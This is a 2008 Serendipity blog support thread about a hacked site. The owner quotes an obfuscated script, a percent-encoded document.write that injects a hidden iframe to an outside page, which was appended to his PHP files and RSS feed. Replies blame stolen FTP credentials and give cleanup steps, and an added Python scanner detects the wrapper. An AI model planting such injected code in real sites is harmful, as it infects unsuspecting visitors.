Site got code injected in.... RSS Feed not working


Post by Andyman77 » Sat Dec 20, 2008 4:10 am

OK, I have cleaned up all the files, or rather I believe I have.

I had a lot of files with the following code appended to the end of them,

Index.php got hit several times even with file permission going at 644!?

Several other files also got hit.


# <!-- o --><Script Language='Javascript'>
# <!-- HTML Encryption provided by iWEBTOOL.com -->
# <!--
# document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%61%6C%65%63%68%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
# //-->
# </Script><!-- c -->



My RSS feed is now not working... as the code has managed to get into it. You can see it at the URL below.

http://feedvalidator.org/check.cgi?url= ... index.rss2

I would love to know how to clear that one up, as I can't find it in any of the files, and have I looked.

thank you in advance,

Andy
Serendipity - Site, finished ;)
Mine that is ... so lots of nonsensical Stuff
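Added example, not part of the original posts and not Serendipity code: a small scanner for the `document.write(unescape('%XX...'))` wrapper shown in the post above, which decodes the argument and reports any iframe it contains, so that hit files (including cached output) can be listed before they are replaced. The function names and the `malicious.example.invalid` sample are constructed for illustration, and `urllib.parse.unquote` is assumed to stand in for JavaScript's `unescape()`, which holds for plain `%XX` ASCII payloads like this one.

```python
import os
import re
from urllib.parse import unquote

# document.write(unescape('<run of %XX bytes>')): the wrapper seen in the post.
INJECT_RE = re.compile(
    r"document\.write\(\s*unescape\(\s*(['\"])((?:%[0-9A-Fa-f]{2}){8,})\1\s*\)\s*\)",
    re.IGNORECASE,
)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"([\w-]+)\s*=\s*[\"']([^\"']*)[\"']")


def scan_text(text):
    """Return one finding per iframe hidden inside an unescape() payload."""
    findings = []
    for match in INJECT_RE.finditer(text):
        # unquote() decodes %XX like JavaScript's unescape() for ASCII payloads.
        decoded = unquote(match.group(2))
        for tag in IFRAME_RE.findall(decoded):
            attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
            style = attrs.get("style", "").replace(" ", "").lower()
            invisible = (attrs.get("width") == "0" or attrs.get("height") == "0"
                         or "display:none" in style)
            findings.append({"offset": match.start(), "src": attrs.get("src"),
                             "invisible": invisible})
    return findings


def scan_tree(root, exts=(".php", ".html", ".htm", ".js", ".tpl")):
    """Scan files under root; returns {path: findings} for files with hits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    found = scan_text(fh.read())
                if found:
                    hits[path] = found
    return hits


def _encode(s):  # builds the constructed sample in the same %XX form
    return "".join("%%%02X" % b for b in s.encode("ascii"))

# Constructed sample: a PHP file with an injected block appended to its end.
SAMPLE_IFRAME = ('<iframe src="http://malicious.example.invalid/index.php" '
                 'width="0" height="0" style="display:none"></iframe>')
SAMPLE_FILE = ("<?php echo 'hello'; ?>\n<Script Language='Javascript'>\n"
               "document.write(unescape('" + _encode(SAMPLE_IFRAME) + "'));\n</Script>")
```

Running `scan_tree()` over the blog directory, `templates_c` included, lists the files that carry the wrapper; a clean result does not show that the account used to upload it has been secured.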


Post by garvinhicking » Sat Dec 20, 2008 3:49 pm

Hi!

This is a common hack of a trojan that has your FTP account data. One of the PCs you used to FTP to your site most probably was infected.

First you need to scan all client PCs that had access to your site for that trojan/backdoor and remove it. Only after that you should change all passwords (MySQL, FTP, blog, Mail, ...), and then upload a fresh, unmodified serendipity release version over your blog.

Also delete all files in your templates_c directory.

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/


Post by Andyman77 » Sat Jan 03, 2009 6:07 pm

Hi,

Firstly, Happy New Year and thanks for S9y 1.4.

I had a huge problem with my host, multiple sites got infected with malware, all but 1 of the sites are now clean.

However, my home page is now back up and working and clean.

I was just thinking with S9y 1.4 with its version checking. Is there a way one can encrypt/compress the main core code of s9y so that there is no way for someone to be able to view the source code?

Just wondering.

regards,

Andy

Post by kleinerChemiker » Sat Jan 03, 2009 7:44 pm

It is possible to "compile" PHP code. But s9y is open source, so even then you could download the uncompiled code and read it. And of course, security by obscurity is a very bad way to enhance security. Look at Windows: without source code, there is enough malware that takes advantage of bugs in the code.


Post by Andyman77 » Sat Jan 03, 2009 7:49 pm

You are correct there. Just an idea, spawned through the madness of 2 weeks of intense problems with my hosting company and my websites.


:roll:

Post by garvinhicking » Sat Jan 03, 2009 11:03 pm

Hi!

Andyman77 wrote: You are correct there. Just an idea, spawned through the madness of 2 weeks of intense problems with my hosting company and my websites.


You did, like I mentioned, SCAN ALL YOUR PCs? Your recent trouble VERY MUCH emphasizes that one of your PCs might be infected, and that you might go through the same problems again in a few days.

Regards,
Garvin

Post by Andyman77 » Sun Jan 04, 2009 4:29 am

Hi Garvin,

Yep, I am using ESET Smart Security, did multiple deep scans and found nothing. I changed all my passwords, using KeePass as a generator.

I did find later that there was a 'hidden' FTP account on my hosting server. No idea how that happened.

All appears to be OK now.